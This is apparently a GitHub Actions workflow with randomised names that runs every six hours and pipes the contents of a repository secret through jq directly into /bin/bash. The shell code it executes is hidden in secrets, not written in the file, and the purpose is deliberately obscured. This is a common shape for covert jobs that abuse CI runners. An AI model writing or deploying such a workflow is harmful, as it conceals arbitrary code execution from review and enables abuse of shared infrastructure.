name: fujiancheng7654
on:
  workflow_dispatch:
  schedule:
    - cron: '15 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fujiancheng7654
        env:
          adx85419: ${{ secrets.adx85419 }}
        run: |
          echo $adx85419 | jq -r .jyz846 | /bin/bash
          echo $ifnfp59021 | jq -r .kclmp9 | /bin/bash
          echo $kktnz6 | jq -r .cfx4 | /bin/bash
          echo $zgtjr169 | jq -r .elzp719 | /bin/bash
          echo $t054 | jq -r .wlrvu67 | /bin/bash
          echo $cze3 | jq -r .col9 | /bin/bash
          echo $epo8836 | jq -r .ncwbx51 | /bin/bash

